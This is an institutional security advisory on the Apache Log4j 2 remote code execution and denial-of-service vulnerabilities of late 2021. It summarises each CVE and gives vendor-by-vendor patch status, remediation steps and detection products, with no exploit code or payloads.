Apache Log4j 2 Vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 & CVE-2021-44832)

The Apache Software Foundation has released a security advisory to address a Remote Code Execution vulnerability (CVE-2021-44228, CVE-2021-45046 & CVE-2021-44832) & Denial of Service (CVE-2021-45105) being actively exploited in the wild.  A remote attacker could exploit these vulnerabilities to take control of an affected system.  Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.  System administrator should take remediation immediately.

 

Vulnerabilities

  • CVE-2021-44228, CVE-2021-45046 & CVE-2021-44832 (Remote Code Execution Vulnerability)

Apache Log4j versions between 2 and 2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.  Attacker who can control log messages or log message parameters can

    • execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.  From log4j 2.15.0, this behavior has been disabled by default.

However, Apache Log4j 2.15.0 was incomplete in certain non-default configurations.  It could allow attackers with

    • control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}) to craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments.  Log4j 2.16.0 fixes this issue by removing the message lookups feature.

Another finding in Apache Log4j2 versions 2.0-beta7 through 2.17.0 which are vulnerable to a remote code execution (RCE) attack where:

    • an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.  This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
  • CVE-2021-45105 (Denial of Service Vulnerability)

It was found that Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups.  This could

    • allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout either with a Context Lookup (for example, $${ctx:loginId}) to craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process.  this is also known as denial of service (DOS) attack.  This issue was fixed in Log4j 2.17.0, 2.12.3 and 2.3.1.

 

Severity Level

  • Critical

 

Affected Systems & Remediation

 

(1) Products confirmed affected:

Products Affected Systems Hotfix status Remediation Reference
Apache All Apache Log4j Java Library versions from 2.0-alpha1 to 2.17.0. Log4j 2.17.1 is ready Upgrade to Log4j 2.17.1 or apply the recommended mitigations immediately. https://logging.apache.org/log4j/2.x/security.html
Java JDK versions lower than 6u211, 7u201, 8u191, and 11.0.1. For Java 8 or later: Log4j to 2.17.1 is ready Java 8 (or later) should upgrade to release 2.17.1. https://www.oracle.com/java/technologies/javase/products-doc-8u121-revision-builds-relnotes.html

Log4j – Download Apache Log4j 2

 

For Java 7: Log4j 2.12.4 is ready Java 7 should upgrade to release 2.12.4.
For Java 6: Log4j 2.3.2 is ready Java 6 should upgrade to release 2.3.2.
Palo Alto PAN-OS 9.0, PAN-OS 9.1, and PAN-OS 10.0 versions for Panorama

This issue is only applicable to Panorama hardware and virtual appliances that have run in Panorama Mode or Log Collector Mode as part of a Collector Group. You can determine if the Panorama is part of a Collector Group by visiting ‘Panorama > Managed Collectors’ from the web interface.

Fixes in PAN-OS 9.0.15, PAN-OS 9.1.12-h3, PAN-OS 10.0.8-h8 are available. Please apply the fix immediately.

If Panorama is running an impacted version of PAN-OS, and you are able to upgrade to PAN-OS 10.1, upgrade all appliances in affected Collector Groups to the latest PAN-OS 10.1 Preferred release (PAN-OS 10.1.3-h1 at time of publication) to remediate these issues.

NOTE: Downgrading to PAN-OS 10.0 or earlier PAN-OS versions is not currently supported once Panorama is upgraded to PAN-OS 10.1.

Palo Alto Networks Security Advisories:

https://security.paloaltonetworks.com/CVE-2021-44228

https://securityadvisories.paloaltonetworks.com

IBM SPSS SPSS Statistics 24.0 or earlier: these versions are End of Service and are no longer supported. Not available as end of support. Please upgrade to a supported release, i.e. 25.0 or later. Please contact ITSC Service Desk in getting the fixes.
SPSS Statistics 25.0 and later Fixes for 25.0 and later are available. Please apply fixes immediately.
IBM WebSphere WebSphere Application Server Liberty Continuous delivery Fix Pack 22.0.0.1 is in development Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PH42762 first.

Apply Fix Pack when they are available.

https://www.ibm.com/support/pages/node/6525706
WebSphere Application Server versions 9.0 Fix Pack 9.0.5.11 is in development
WebSphere Application Server versions 8.5 Fix Pack 8.5.5.21 is in development
WebSphere Application Server versions 8.0 Fix Pack 8.0.0.15 is in development
WebSphere Application Server versions 7.0 Fix Pack 7.0.0.45 is in development
VMware Multiple products Fixes for some product are available Please apply fixes immediately. https://www.vmware.com/security/advisories/VMSA-2021-0028.html
Some products which still pending for patches Please implement related ‘Workarounds’ first.
RedHat Some of the Openshift and JBoss packages Security errata for most affected platforms are released Please apply the errata immediately. https://access.redhat.com/security/cve/cve-2021-44228
Microsoft Multiple products Security Update for some products are available in Security Update Guide Please implement the updates immediately. Microsoft’s Response to CVE-2021-44228 Apache Log4j 2
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/CVE-2021-44228 – Security Update Guide – Microsoft – Apache Log4j Remote Code Execution Vulnerability
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-44228
Some products which still pending for update patch Please refer to related ‘Additional Information’ link in their Security Update Guide.
Citrix Multiple products Update patches are available Please apply related latest patch as soon as possible https://support.citrix.com/article/CTX335705

 

(2) Products still under evaluation:

Products Reference

 

(3) Products which can detect the vulnerability:

Products Product version Reference
Microsoft Microsoft Defender and other MS security solutions Guidance for preventing detecting and hunting for CVE-2021-44228 log4j2 exploitation
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
Kaspersky Kaspersky Endpoint Security for Business Kaspersky products protect against attacks leveraging the vulnerability under the following names:
UMIDS:Intrusion.Generic.CVE-2021-44228.
PDM:Exploit.Win32.Generic
Palo Alto Applications and Threats Content version 8502 released Vulnerability Signatures ID: 91994, 91995, 92001
Fortinet Fortigate  Log4j2 Vulnerability | FortiGuard (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability)

Fortinet has additional research relating to Log4j. This blog discusses the vulnerability, what protections Fortinet has in place to protect our customers, and the work being done to ensure that Fortinet products are not susceptible to this vulnerability. This Threat Signal provides answers to some additional questions surrounding the vulnerability.

 

Reference

 

Enquiry

 

 

Published on: 11 Dec 2021

Last update on: 30 Dec 2021